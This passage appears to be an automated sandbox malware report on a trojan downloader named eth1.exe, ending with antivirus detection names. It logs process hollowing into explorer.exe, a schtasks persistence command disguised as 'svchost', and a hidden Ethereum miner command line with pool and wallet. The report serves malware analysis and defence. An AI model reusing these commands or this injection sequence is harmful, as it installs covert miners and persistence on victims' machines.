WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: (@Xpè ¸ È Ø7hh77} IDI_ICON1( ~YR~WP ~XQ ~YR~VO{H>a[Ha[[}TM~YR\|NEnj_Y(fa\|e`¯`Z?lh}SKw3'_X\Ue`didfa½d_¢^X`Zz?3~ZS~VOc^Qhcyf`qd_faÄc^~ZS \V~XPw3'a[9e`pb\_aZo`Za[d_¬a\XzA6~ZS~YR\U~YQ_YZ`Zgd^f`¶d^Úb\µ`Z`Z{~[T(`Z}VN~WP·ÿÿ[T=c]f`gaµga¸d^Þd^çd^Ûa[¨\UKj}UM}UNlg`Y5gagb¦ga±ga¹d^Þd^äd_Þd_Í`ZKlh}UM~YR}VOd^Tid\|hcga¥e_Òe`ÏfaÇc^~YR ~\UyC;a[]Wfamidvhcfa¹faÅe_®_Y*b]z?7}UMt%a[>hcwidfa¸faÂb\]s}VN\U~ZRd_]icfa»d^~[U]W\|NFe`_X$ga{e`¬`Z8e`\|LD~WP{J@b\Nb\c}SL~XQ~[T~ZR~ZS~[Uþü?ü?øðàààààððøü?ü?þ h<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0000000140371000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1	0
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: @ base_address: 0x000007fffffd8010 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1	0

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 4608 injected into non-child 7280
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: MZÿÿ¸@(º´ Í!¸LÍ!This program cannot be run in DOS mode. $ò+¯¶èEü¶èEü¶èEü¿Öü èEü½Aý¼èEü½FýµèEü½@ýèEü½Dý°èEüíDý»èEü¶èDüÞêEü.ü·èEü.ü¦èEüpAýêEüp@ý¸èEüpLý¥èEüpEý·èEüpºü·èEü¶èÒü·èEüpGý·èEüRich¶èEüPEdÚe`ð"J øì@ 7:Þ7``À,X¸À,¤70. 7Dq`½)°¾)(½)0` .text÷H J `.rdata¡` ¢N @@.data-Æð,@À.pdata0.¶-@@.nv_fatbH6À/8@/@À.nvFatBi7x6@À.rsrc7z6@@.relocDq 7r6@B base_address: 0x0000000140000000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 4608 called NtSetContextThread to modify thread in remote process 7280
NtSetContextThread April 10, 2021, 8:48 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 5370776556 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 1178904 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1998505216 registers.rdx: 8796092858368 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x00000000000001e0 process_identifier: 7280	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 4608 resumed a thread in remote process 7280
NtResumeThread April 10, 2021, 8:48 a.m.	thread_handle: 0x00000000000001e0 suspend_count: 1 process_identifier: 7280	1	0	0

Executed a process and injected code into it, probably while unpacking (48 events)

Time & API	Arguments	Status	Return
NtResumeThread April 10, 2021, 8:54 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 8212	1	0
NtResumeThread April 10, 2021, 8:54 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 8212	1	0
NtResumeThread April 10, 2021, 8:54 a.m.	thread_handle: 0x0000019c suspend_count: 1 process_identifier: 8212	1	0
NtResumeThread April 10, 2021, 8:54 a.m.	thread_handle: 0x00000358 suspend_count: 1 process_identifier: 8212	1	0
CreateProcessInternalW April 10, 2021, 8:54 a.m.	thread_identifier: 5096 thread_handle: 0x00000500 process_identifier: 7232 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Tempmsmp.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Tempmsmp.exe" filepath_r: C:\Users\test22\AppData\Local\Tempmsmp.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000504	1	1
NtResumeThread April 10, 2021, 8:46 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 7232	1	0
NtResumeThread April 10, 2021, 8:46 a.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 7232	1	0
NtResumeThread April 10, 2021, 8:46 a.m.	thread_handle: 0x0000000000000178 suspend_count: 1 process_identifier: 7232	1	0
NtResumeThread April 10, 2021, 8:47 a.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 7232	1	0
CreateProcessInternalW April 10, 2021, 8:47 a.m.	thread_identifier: 4960 thread_handle: 0x0000000000000360 process_identifier: 8948 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000368	1	1
NtResumeThread April 10, 2021, 8:47 a.m.	thread_handle: 0x0000000000000368 suspend_count: 1 process_identifier: 7232	1	0
CreateProcessInternalW April 10, 2021, 8:47 a.m.	thread_identifier: 7772 thread_handle: 0x00000000000003d0 process_identifier: 8740 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe" filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003ec	1	1
NtResumeThread April 10, 2021, 8:47 a.m.	thread_handle: 0x00000000000003d4 suspend_count: 1 process_identifier: 7232	1	0
CreateProcessInternalW April 10, 2021, 8:47 a.m.	thread_identifier: 1608 thread_handle: 0x00000000000003fc process_identifier: 4608 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\svchost.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\svchost.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\svchost.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000410	1	1
CreateProcessInternalW April 10, 2021, 8:47 a.m.	thread_identifier: 4024 thread_handle: 0x0000000000000060 process_identifier: 8724 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
NtResumeThread April 10, 2021, 8:47 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 8740	1	0
NtResumeThread April 10, 2021, 8:47 a.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 8740	1	0
NtResumeThread April 10, 2021, 8:47 a.m.	thread_handle: 0x0000000000000174 suspend_count: 1 process_identifier: 8740	1	0
NtResumeThread April 10, 2021, 8:47 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 4608	1	0
NtResumeThread April 10, 2021, 8:47 a.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 4608	1	0
NtResumeThread April 10, 2021, 8:47 a.m.	thread_handle: 0x00000000000001a4 suspend_count: 1 process_identifier: 4608	1	0
NtResumeThread April 10, 2021, 8:47 a.m.	thread_handle: 0x00000000000001e8 suspend_count: 1 process_identifier: 4608	1	0
CreateProcessInternalW April 10, 2021, 8:47 a.m.	thread_identifier: 3684 thread_handle: 0x0000000000000358 process_identifier: 7012 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000360	1	1
NtResumeThread April 10, 2021, 8:48 a.m.	thread_handle: 0x0000000000000364 suspend_count: 1 process_identifier: 4608	1	0
CreateProcessInternalW April 10, 2021, 8:48 a.m.	thread_identifier: 6660 thread_handle: 0x00000000000003d0 process_identifier: 3468 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe" filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003ec	1	1
NtResumeThread April 10, 2021, 8:48 a.m.	thread_handle: 0x00000000000001e4 suspend_count: 1 process_identifier: 4608	1	0
NtGetContextThread April 10, 2021, 8:48 a.m.	thread_handle: 0x00000000000000c8	1	0
NtResumeThread April 10, 2021, 8:48 a.m.	thread_handle: 0x00000000000000c8 suspend_count: 1 process_identifier: 4608	1	0
CreateProcessInternalW April 10, 2021, 8:48 a.m.	thread_identifier: 7824 thread_handle: 0x00000000000001e0 process_identifier: 7280 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: C:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0x4a82b262BbF466b9F3f946C226CB8A672cFC2F9d`.CTEST22PC@us1.ethermine.org:4444 --unam-stealth filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 1 process_handle: 0x00000000000001dc	1	1
NtUnmapViewOfSection April 10, 2021, 8:48 a.m.	base_address: 0x0000000140000000 region_size: 8786417680384 process_identifier: 7280 process_handle: 0x00000000000001dc		-1073741799
NtAllocateVirtualMemory April 10, 2021, 8:48 a.m.	process_identifier: 7280 region_size: 3645440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000001dc	1	0
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: MZÿÿ¸@(º´ Í!¸LÍ!This program cannot be run in DOS mode. $ò+¯¶èEü¶èEü¶èEü¿Öü èEü½Aý¼èEü½FýµèEü½@ýèEü½Dý°èEüíDý»èEü¶èDüÞêEü.ü·èEü.ü¦èEüpAýêEüp@ý¸èEüpLý¥èEüpEý·èEüpºü·èEü¶èÒü·èEüpGý·èEüRich¶èEüPEdÚe`ð"J øì@ 7:Þ7``À,X¸À,¤70. 7Dq`½)°¾)(½)0` .text÷H J `.rdata¡` ¢N @@.data-Æð,@À.pdata0.¶-@@.nv_fatbH6À/8@/@À.nvFatBi7x6@À.rsrc7z6@@.relocDq 7r6@B base_address: 0x0000000140000000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: base_address: 0x0000000140001000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: base_address: 0x0000000140206000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: base_address: 0x00000001402d1000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: base_address: 0x00000001402e3000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: base_address: 0x00000001402fc000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: ±CbFÀ/@ base_address: 0x0000000140370000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: (@Xpè ¸ È Ø7hh77} IDI_ICON1( ~YR~WP ~XQ ~YR~VO{H>a[Ha[[}TM~YR\|NEnj_Y(fa\|e`¯`Z?lh}SKw3'_X\Ue`didfa½d_¢^X`Zz?3~ZS~VOc^Qhcyf`qd_faÄc^~ZS \V~XPw3'a[9e`pb\_aZo`Za[d_¬a\XzA6~ZS~YR\U~YQ_YZ`Zgd^f`¶d^Úb\µ`Z`Z{~[T(`Z}VN~WP·ÿÿ[T=c]f`gaµga¸d^Þd^çd^Ûa[¨\UKj}UM}UNlg`Y5gagb¦ga±ga¹d^Þd^äd_Þd_Í`ZKlh}UM~YR}VOd^Tid\|hcga¥e_Òe`ÏfaÇc^~YR ~\UyC;a[]Wfamidvhcfa¹faÅe_®_Y*b]z?7}UMt%a[>hcwidfa¸faÂb\]s}VN\U~ZRd_]icfa»d^~[U]W\|NFe`_X$ga{e`¬`Z8e`\|LD~WP{J@b\Nb\c}SL~XQ~[T~ZR~ZS~[Uþü?ü?øðàààààððøü?ü?þ h<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0000000140371000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: base_address: 0x0000000140372000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1
NtGetContextThread April 10, 2021, 8:48 a.m.	thread_handle: 0x00000000000001e0	1	0
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: @ base_address: 0x000007fffffd8010 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1
NtSetContextThread April 10, 2021, 8:48 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 5370776556 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 1178904 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1998505216 registers.rdx: 8796092858368 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x00000000000001e0 process_identifier: 7280	1	0
NtResumeThread April 10, 2021, 8:48 a.m.	thread_handle: 0x00000000000001e0 suspend_count: 1 process_identifier: 7280	1	0
CreateProcessInternalW April 10, 2021, 8:47 a.m.	thread_identifier: 7908 thread_handle: 0x0000000000000060 process_identifier: 5352 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
NtResumeThread April 10, 2021, 8:48 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 3468	1	0
NtResumeThread April 10, 2021, 8:48 a.m.	thread_handle: 0x0000000000000138 suspend_count: 1 process_identifier: 3468	1	0
NtResumeThread April 10, 2021, 8:48 a.m.	thread_handle: 0x00000000000001a0 suspend_count: 1 process_identifier: 3468	1	0

File has been identified by 43 AntiVirus engines on VirusTotal as malicious (43 events)

Elastic	malicious (high confidence)
DrWeb	Trojan.Siggen12.45962
MicroWorld-eScan	Trojan.GenericKD.46042374
FireEye	Generic.mg.6cf3b3623fc911c3
ALYac	Trojan.GenericKD.46042374
Cylance	Unsafe
Zillya	Trojan.DOTHETUK.Win32.5180
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan-Downloader ( 005798a51 )
Alibaba	Trojan:MSIL/DOTHETUK.d70115ef
K7GW	Trojan-Downloader ( 005798a51 )
Cybereason	malicious.8bc4d9
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/TrojanDownloader.Small.CLG
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Trojan.MSIL.DOTHETUK.xko
BitDefender	Trojan.GenericKD.46042374
Ad-Aware	Trojan.GenericKD.46042374
Emsisoft	Trojan.GenericKD.46042374 (B)
F-Secure	Trojan.TR/Downloader.Gen
McAfee-GW-Edition	RDN/Generic Downloader.x
Sophos	Mal/Generic-S
Ikarus	Trojan-Dropper.MSIL.Agent
Avira	TR/Downloader.Gen
Gridinsoft	Trojan.Win32.Downloader.sa
Microsoft	Backdoor:Win32/Bladabindi!ml
AegisLab	Trojan.MSIL.DOTHETUK.4!c
GData	Win32.Trojan-Downloader.Generic.7CMZYW
Cynet	Malicious (score: 99)
AhnLab-V3	Trojan/Win.Generic.C4387213
McAfee	RDN/Generic Downloader.x
MAX	malware (ai score=80)
VBA32	TScope.Trojan.MSIL
Malwarebytes	Malware.AI.1417145416
Rising	Downloader.Small!8.B41 (CLOUD)
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_89%
Fortinet	MSIL/Small.CLG!tr.dldr
Webroot	W32.Trojan.Gen
Panda	Trj/Agent.PM
CrowdStrike	win/malicious_confidence_100% (W)
Qihoo-360	Win32/TrojanDownloader.Generic.HwMAXT8A

eth1.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All